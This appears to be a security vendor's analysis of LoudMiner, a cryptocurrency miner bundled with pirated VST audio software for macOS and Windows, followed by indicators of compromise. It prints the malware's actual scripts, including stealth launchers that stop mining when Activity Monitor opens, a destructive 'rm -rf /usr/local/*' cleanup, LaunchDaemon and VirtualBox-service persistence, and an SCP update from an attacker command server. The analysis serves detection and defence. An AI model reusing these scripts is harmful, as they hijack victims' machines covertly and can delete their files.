The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS

Introduction

LoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018. It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. The miner itself is based on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.

Distribution

At the time of writing, there are 137 VST-related applications (42 for Windows and 95 for macOS) available on a single WordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments 5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems safe to assume they are all Trojanized.

The applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in the IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner.

Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production; thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The attackers use this to their advantage to camouflage their VM images. Moreover, the decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.

Here are some examples of applications, as well as some comments you can find on the website:

Propellerhead Reason

Ableton Live

Sylenth1

Nexus

Reaktor 6

AutoTune

User reports

We found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on their Mac:

A user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this.” The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU resources and running as root.”

Analysis of pirated applications

The general idea of both macOS and Windows analyses stays the same:

An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. User downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after. LoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and the mining starts. Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries).

While analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled with the actual software, the C&C server domain, and something we believe is a version string created by the author.

macOS

We’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in installerdata.dmg from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way. Each version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is achieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to true, ensuring the process will be restarted if stopped. Each version has these components:

QEMU Linux images. Shell scripts used to launch the QEMU images. Daemons used to start the shell scripts at boot and keep them running. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running.

The CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process is running, the mining stops. Otherwise, it checks for how long the system has been idle in seconds:

ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}' 1 ioreg - c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'

If it’s been longer than 2 minutes, it starts the mining. If it’s been less than 2 minutes, it checks the total CPU usage:

ps -A -o %cpu | awk '{s+=$1} END {print s }' 1 ps - A - o % cpu | awk '{s+=$1} END {print s }'

divides that by the number of CPU cores:

sysctl hw.logicalcpu |awk '{print $2 }') 1 sysctl hw . logicalcpu | awk '{print $2 }' )

and if it’s greater than 85%, it stops the mining. The script itself is a bit different across versions, but the general idea stays the same.

After the installation is done, all miner-related installation files are deleted.

Version 1

The miner files in the downloaded application package are not obfuscated in any way or placed in another package; they are installed alongside the software in the following places:

/Library/Application Support/.Qemusys qemu-system-x86_64 – clean QEMU binary sys00_1-disk001.qcow2 – Linux image (first) qemuservice – shell script that launches the first image via the qemu-system-x86_64 binary (see Script 1 listing)

/Library/Application Support/.System-Monitor system-monitor.daemon – launches first image via system-monitor binary

/usr/local/bin .Tools-Service sys00_1-disk001.qcow2 – Linux image (second) tools-service.daemon – launches second image via tools-service binary cpumonitor – starts/stops mining based on idle time and CPU usage system-monitor – copy of qemu-system-x86_64 binary tools-service – copy of qemu-system-x86_64 binary

/Library/LaunchDaemons buildtools.system-monitor.plist – launches system-monitor.daemon buildtools.tools-service.plist – launches tools-service.daemon modulesys.qemuservice.plist – launches qemuservice systools.cpumonitor.plist – launches cpumonitor



#!/bin/bash function start { pgrep "Activity Monitor" if [ $? -eq 0 ]; then launchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist else /usr/local/bin/qemu-system-x86_64 -M accel=hvf --cpu host /Library/Application\ Support/.Qemusys/sys00_1-disk001.qcow2 -display none fi } start; 1 2 3 4 5 6 7 8 9 10 #!/bin/bash function start { pgrep "Activity Monitor" if [ $ ? - eq 0 ] ; then launchctl unload - w / Library / LaunchDaemons / com . modulesys . qemuservice . plist else / usr / local / bin / qemu - system - x86_64 - M accel = hvf -- cpu host / Library / Application \ Support / . Qemusys / sys00_1 - disk001 . qcow2 - display none fi } start ;

Script 1. qemuservice shell script

After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed:

qemuservice won’t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by.

won’t launch the image if the process is running. In fact, if it is running, it will unload the plist that it was launched by. tools-service.daemon will launch the image only when qemu-system-x86_64 process is not running and after sleeping for 45 minutes.

will launch the image only when process is not running and after sleeping for 45 minutes. System-monitor.daemon will launch the image only if Intel i5, i7 or i9 CPU is detected.

These scripts use the same command to launch the QEMU image, only differing in names and the image path.

We’ve found the following screenshot related to version 1 of the miner:

It is from Little Snitch indicating that some connections from the process qemu-system-x86_64 were blocked. Specifically, hopto[.]org (a free hostname service) is a C&C used by version 1 of the miner.

Version 2

Miner files are in data_installer.pkg inside the downloaded application package. data_installer.pkg is installed first, then the VST software. Before installation, version 1 of the miner is removed along with executing the command:

rm -rf /usr/local/* 1 rm - rf / usr / local / *

As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process.

#!/bin/bash #Clear Old function clear { LGC=`ps aux |grep "qemu-system-x86_64" |wc -l` if [ $LGC -ge 2 ] Then launchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist launchctl unload -w /Library/LaunchDaemons/com.buildtools.tools-service.plist launchctl unload -w /Library/LaunchDaemons/com.buildtools.system-monitor.plist launchctl unload -w /Library/LaunchDaemons/com.systools.cpumonitor.plist rm -f /Library/LaunchDaemons/com.buildtools.system-monitor.plist rm -f /Library/LaunchDaemons/com.modulesys.qemuservice.plist rm -f /Library/LaunchDaemons/com.buildtools.tools-service.plist rm -f /Library/LaunchDaemons/com.systools.cpumonitor.plist rm -rf /Library/Application\ Support/.Qemusys rm -rf /usr/local/bin/.Tools-Service rm -rf /Library/Application\ Support/.System-Monitor/ rm -rf /usr/local/* fi exit 0 } clear; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 #!/bin/bash #Clear Old function clear { LGC = ` ps aux | grep "qemu-system-x86_64" | wc - l ` if [ $ LGC - ge 2 ] Then launchctl unload - w / Library / LaunchDaemons / com . modulesys . qemuservice . plist launchctl unload - w / Library / LaunchDaemons / com . buildtools . tools - service . plist launchctl unload - w / Library / LaunchDaemons / com . buildtools . system - monitor . plist launchctl unload - w / Library / LaunchDaemons / com . systools . cpumonitor . plist rm - f / Library / LaunchDaemons / com . buildtools . system - monitor . plist rm - f / Library / LaunchDaemons / com . modulesys . qemuservice . plist rm - f / Library / LaunchDaemons / com . buildtools . tools - service . plist rm - f / Library / LaunchDaemons / com . systools . cpumonitor . plist rm - rf / Library / Application \ Support / . Qemusys rm - rf / usr / local / bin / . Tools - Service rm - rf / Library / Application \ Support / . System - Monitor / rm - rf / usr / local / * fi exit 0 } clear ;

Script 2. data_installer.pkg preinstall script that removes version 1



The following temporary files are created:

/Users/Shared z1 – QEMU binary z1.daemon – launches the QEMU image with the QEMU binary z1.qcow2 – QEMU image z1.plist – launches z1.daemon z3 – CPU monitor script, little change from version 1 cpumonitor z3.plist – used to launch z3 randwd – generates random names



After dependencies are copied over, the miner is installed. This time the names of QEMU binaries, plists and directories are randomized with the randwd script. The miner installation creates two copies of z1, z1.daemon, z1.qcow2 and z1.plist. For each copy, the following happens:

A directory with a random name is created in /Library/Application Support

The QEMU binary z1 carries the same name as the directory and is copied into /usr/local/bin

carries the same name as the directory and is copied into z1.daemon (see listing in Script 3) and z1.qcow2 are copied into this directory under their random names

(see listing in Script 3) and are copied into this directory under their random names z1.plist is copied with the name com.<random_name>.plist into /Library/LaunchDaemons

z1.daemon, z1.plist, z3 and z3.plist files serve as templates. References to other scripts, binaries, plists, etc. in these files are replaced by their corresponding generated random name.

A random name is also chosen for the CPU monitor (z3) shell script and its accompanying plist file. z3 is copied into /usr/local/bin and the plist into /Library/LaunchDaemons under the name com.<random_name>.plist.

#!/bin/bash function start { pgrep "Activity Monitor" if [ $? -eq 0 ]; then launchctl unload -w /Library/LaunchDaemons/com.AAAA.plist else /usr/local/bin/BBBB -M accel=hvf --cpu host /Library/Application\ Support/CCCC/DDDD -display none fi } start; 1 2 3 4 5 6 7 8 9 10 #!/bin/bash function start { pgrep "Activity Monitor" if [ $ ? - eq 0 ] ; then launchctl unload - w / Library / LaunchDaemons / com . AAAA . plist else / usr / local / bin / BBBB - M accel = hvf -- cpu host / Library / Application \ Support / CCCC / DDDD - display none fi } start ;

Script 3. z1.daemon shell script

Version 2 is a bit cleaner and/or simpler than version 1. There is only one QEMU image, with two copies made; same for the image launcher scripts, daemons and the cpumonitor. Even though version 2 randomizes its filenames and directories, it can only be installed once because the installation checks for running processes with accel=hvf in their command line.

From the version 2 applications we’ve checked so far, the SHA1 hash of the data_installer.pkg is always 39a7e86368f0e68a86cce975fd9d8c254a86ed93.

Version 3

The miner files are in an encrypted DMG file, called do.dmg, inside the application package. The DMG is mounted with the following command:

printf '%s\0' 'VeryEasyPass123!' | hdiutil attach -noverify /Users/Shared/instapack/do.dmg -stdinpass. 1 printf '%s\0' 'VeryEasyPass123!' | hdiutil attach - noverify / Users / Shared / instapack / do . dmg - stdinpass .

The miner DMG contains a single package: datainstallero.pkg. This and the software package are then installed.

The package contents of datainstallero.pkg and data_installer.pkg from version 2 are more or less the same, but datainstallero.pkg adds two obfuscated scripts – clearpacko.sh and installpacko.sh – and obfuscates an existing script – randwd:

clearpacko.sh removes version 1 of the miner like version 2 does.

removes version 1 of the miner like version 2 does. installpacko.sh installs the miner the same way version 2 does, except the comments have been stripped from the script.

The SHA1 of the do.dmg remains the same as well: b676fdf3ece1ac4f96a2ff3abc7df31c7b867fb9.

Launching the Linux image

All versions use multiple shell scripts to launch the images. The shell scripts are executed by plists on boot and are kept alive.

Version 1 executes the following binaries (copies of qemu-system-x86_64 ) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service .

) to launch the QEMU images: . Versions 2 and 3 use the same command, but the filename of the binary, directory in Application Support and the QEMU filename is randomized.

All versions use the following switches:

-M accel=hvf to use the Hypervisor framework as an accelerator. HVF was introduced with OS X 10.10 and support for HVF was added in QEMU 2.12, which was released in April 2018.

to use the Hypervisor framework as an accelerator. HVF was introduced with OS X 10.10 and support for HVF was added in QEMU 2.12, which was released in April 2018. -display none so the virtual machine runs without a graphical interface.

Since the image is launched without specifying the amount of RAM and # of CPU cores, the default values are used: 1 CPU core and 128MB of RAM. All versions can launch 2 images.

Windows (version 4)

From the strings we extracted from the application, we define the only Windows version seen so far as version 4. As we mentioned earlier, the logic is quite similar to the macOS version. Each Windows application is packaged as an MSI installer that installs both the “cracked” application, and Figure 8 shows the trust popup for installing the VirtualBox driver when running a “cracked” VST installer from vstcrack[.]com.

VirtualBox is installed in its usual folder name (C:\Program Files\Oracle); however, the attributes of the directory are set to “hidden”. Then the installer copies the Linux image and VBoxVmService (a Windows service used to run a VirtualBox virtual machine as a service) into C:\vms, which is also a hidden directory. Once the installation is complete, the installer runs a batch script compiled with BAT2EXE (see the unpacked listing in Script 4) to import the Linux image and run VmServiceControl.exe to start the virtual machine as a service.

@echo off setlocal EnableExtensions EnableDelayedExpansion "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" setproperty machinefolder "%userprofile%\appdata\roaming" "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" import "c:\vms\tmp\sys00_1.ova" xcopy /Y "C:\Windows\System32\Config\systemprofile\.VirtualBox" "C:\vms\.VirtualBox\" "C:\vms\VmServiceControl.exe" -i del /F "c:\vms\tmp\sys00_1.ova" 1 2 3 4 5 6 7 @ echo off setlocal EnableExtensions EnableDelayedExpansion "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" setproperty machinefolder "%userprofile%\appdata\roaming" "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" import "c:\vms\tmp\sys00_1.ova" xcopy / Y "C:\Windows\System32\Config\systemprofile\.VirtualBox" "C:\vms\.VirtualBox\" " C : \ vms \ VmServiceControl . exe " -i del /F " c : \ vms \ tmp \ sys00_1 . ova "

Script 4. Batch script used to run the Linux virtual machine as a service

This method is used to ensure the persistence of the miner after reboot. Indeed, VboxVmService comes with a configuration file (see Script 5) in which it is possible to enable the AutoStart option so the virtual machine is automatically launched at startup.

[Settings] VBOX_USER_HOME=C:\vms\.VirtualBox RunWebService=no PauseShutdown=5000 [Vm0] VmName=sys00_1 ShutdownMethod=acpipowerbutton AutoStart=yes 1 2 3 4 5 6 7 8 [ Settings ] VBOX_USER_HOME = C : \ vms \ . VirtualBox RunWebService = no PauseShutdown = 5000 [ Vm0 ] VmName = sys00_1 ShutdownMethod = acpipowerbutton AutoStart = yes

Script 5. Configuration file for VBoxVmService with AutoStart enabled

The OVF file included in the Linux image describes the hardware configuration of the virtual machine (see Script 6): it uses 1GB of RAM and 2 CPU cores (with a maximum usage of 90%).

<Hardware> <CPU count="2" executionCap="90"> <PAE enabled="true"/> <LongMode enabled="true"/> <X2APIC enabled="true"/> <HardwareVirtExLargePages enabled="true"/> </CPU> <Memory RAMSize="1024"/> 1 2 3 4 5 6 7 8 < Hardware > < CPU count = "2" executionCap = "90" > < PAE enabled = "true" / > < LongMode enabled = "true" / > < X2APIC enabled = "true" / > < HardwareVirtExLargePages enabled = "true" / > < / CPU > < Memory RAMSize = "1024" / >

Script 6. Hardware configuration of the Linux image

Linux image

The Linux image is Tiny Core Linux 9.0 configured to run XMRig, as well as some files and scripts to keep the miner updated continuously. The most interesting files are:

/root/.ssh/{id_rsa, id_rsa.pub} – the SSH pair key used to update the miner from the C&C server using SCP.

– the SSH pair key used to update the miner from the C&C server using SCP. /opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8):

/usr/bin/sethostname box /opt/bootlocal.sh 2>&1 > /dev/null & echo "booting" > /etc/sysconfig/noautologin 1 2 3 / usr / bin / sethostname box / opt / bootlocal . sh 2 > & 1 > / dev / null & echo "booting" > / etc / sysconfig / noautologin

Script 7. bootsync.sh

/mnt/sda1/tools/bin/idgenerator 2>&1 > /dev/null /mnt/sda1/tools/bin/xmrig_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ccommand_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ccommand 2>&1 > /dev/null /mnt/sda1/tools/bin/xmrig 1 2 3 4 5 / mnt / sda1 / tools / bin / idgenerator 2 > & 1 > / dev / null / mnt / sda1 / tools / bin / xmrig _ update 2 > & 1 > / dev / null / mnt / sda1 / tools / bin / ccommand _ update 2 > & 1 > / dev / null / mnt / sda1 / tools / bin / ccommand 2 > & 1 > / dev / null / mnt / sda1 / tools / bin / xmrig

Script 8. bootlocal.sh

/mnt/sda1/tools/bin – main files and scripts used to update and run the miner.

– main files and scripts used to update and run the miner. /mnt/sda1/tools/xmrig – contains the source code of XMRig (from the GitHub repository).

The configuration of the miner is stored in /mnt/sda1/tools/bin/config.json and contains mostly the domain name and the port used for the mining pool, which can differ depending on the version (see examples in the IoCs section).

The update mechanism is performed via SCP (Secure File Copy) by three different scripts:

xmrig_update – updates the configuration of the miner ( config.json );

– updates the configuration of the miner ( ); ccommand – updates ccommand_update, xmrig_update (see Script 9), updater.sh, xmrig ;

– updates (see Script 9), ; ccommand_update – updates ccommand ;

From what we have seen, the miner configuration is updated once every day.

#!/bin/sh ping -w 40 127.0.0.1 cd /mnt/sda1/tools/bin/ && scp -P 5100 -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null x01@system-update.is:ctrl/cowboinvox`date +%Y%m%d` config.json.new && mv config.json config.json.bkp && mv config.json.new config.json 1 2 3 #!/bin/sh ping - w 40 127.0.0.1 cd / mnt / sda1 / tools / bin / && scp - P 5100 - C - o StrictHostKeyChecking = no - o UserKnownHostsFile = / dev / null x01 @ system - update . is : ctrl / cowboinvox ` date + % Y % m % d ` config . json . new && mv config . json config . json . bkp && mv config . json . new config . json

Script 9. xmrig_update

In order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script.

Protection

Obviously, the best advice to be protected against this kind of threat is to not download pirated copies of commercial software. There are, however, some hints that can help you to identify when an application contains unwanted code:

A trust popup from an unexpected, “additional” installer (in this case the Oracle network adapter).

High CPU consumption by a process you did not install (QEMU or VirtualBox in this case).

A new service added to the startup services list (Windows) or a new Launch Daemon (macOS).

Network connections to curious domain names (such as system-update[.]info or system-check[.]services here).

Indicators of Compromise (IoCs)

Hashes

macOS “cracked” applications (versions 1-3)

SHA-1 Filename ESET detection name Version number 71030028c4e1b844c85138bd77ddea96a190ec2c Virtual_DJ_8_Pro_Infinity_macOS.pkg OSX/LoudMiner.A 1 32c80edcec4f7bb3b494e8949c6f2014b7f5db65 Native Instruments Massive Installer.pkg OSX/LoudMiner.A 1 7dc9f8ca07cd8e0247cf15cd8d2da2190a02fc90 Massive_v1.5.5_Installer_macOS.dmg OSX/LoudMiner.B 2 0b40bd0754637d5be2ada760ff0ecfda7afe03d7 Native_Instruments_Effects_Series_Mod_Pack.dmg OSX/LoudMiner.B 2 88efc767a32299e922f1b41f82c8d584585e2161 Spectrasonics_Omnisphere_2.5_OSx.dmg OSX/LoudMiner.C 3 e9c9d17d006fb03d67b736c0826df0af8ca6d5fd Lennar_Digital_Sylenth1_2.2.1.dmg OSX/LoudMiner.C 3

Windows “cracked” applications (version 4)

SHA-1 Filename ESET detection name 23faacfc23cfef65504d7fa20854030b96a9df91 Ableton.Live.Suite.10.0.6.Multilingual.x64.WIN.zip Win32/LoudMiner.A 5a8682eae69b2e11d45980941a972bd734630207 Infected-Mushroom-Manipulator-V1.0.3.zip Win32/LoudMiner.A 60a8f1d4a028153271093e815e8267bd25fde852 Sonic_Academy_ANA_2.0.3_x86_x64.msi Win32/LoudMiner.A 7c7876058783da85d5502b9406f7fb4d26f66238 SoundToys_5.0.1_x64-SetupFiles.rar Win32/LoudMiner.A a1a1dc7876d71749a8bc5690c537451770ef4ab8 Valhalla-DSP-Full-Bundle-setupfiles.zip Win32/LoudMiner.A

Linux images

SHA-1 Filename Version number dd9b89a3c5a88fb679f098e2c2847d22350e23b1 sys00_1-disk001.qcow2 1 d1e42e913da308812dd8da1601531b197c1a09a1 sys00_1-disk001.qcow2 1 39a7e86368f0e68a86cce975fd9d8c254a86ed93 z1.qcow2 (renamed with a randomized name) 2 59026ffa1aa7b60e5058a0795906d107170b9e0f z1.qcow2 (renamed with a randomized name) 3 fcf5c3b560295ee330b97424b7354fd321757cc6 sys00_1.ova 4 fc60431a0172d5b8cf4b34866567656467cf861c sys00_1.ova 4

Filenames

macOS

/Library/Application Support/.Qemusys

/Library/Application Support/.System-Monitor

/usr/local/bin/{.Tools-Service, cpumonitor, system-monitor, tools-service}

/Library/LaunchDaemons/{com.buildtools.system-monitor.plist, com.buildtools.tools-service.plist, com.modulesys.qemuservice.plist, com.systools.cpumonitor.plist}

Windows

C:\vms

Hostnames

vstcrack[.]com (137[.]74.151.144)

Download hosts (via HTTP on port 80)

185[.]112.156.163

185[.]112.156.29

185[.]112.156.70

185[.]112.157.102

185[.]112.157.103

185[.]112.157.105

185[.]112.157.12

185[.]112.157.181

185[.]112.157.213

185[.]112.157.24

185[.]112.157.38

185[.]112.157.49

185[.]112.157.53

185[.]112.157.65

185[.]112.157.72

185[.]112.157.79

185[.]112.157.85

185[.]112.157.99

185[.]112.158.112

185[.]112.158.133

185[.]112.158.186

185[.]112.158.190

185[.]112.158.20

185[.]112.158.3

185[.]112.158.96

d-d[.]host (185[.]112.158.44)

d-d[.]live (185[.]112.156.227)

d-d[.]space (185[.]112.157.79)

m-m[.]icu (185[.]112.157.118)

Update hosts (via SCP)

aly001[.]hopto.org (192[.]210.200.87, port 22)

system-update[.]is (145[.]249.104.109, port 5100)

Mining hosts

system-update[.]info (185[.]193.126.114, port 443 or 8080)

system-check[.]services (82[.]221.139.161, port 8080)

MITRE ATT&CK techniques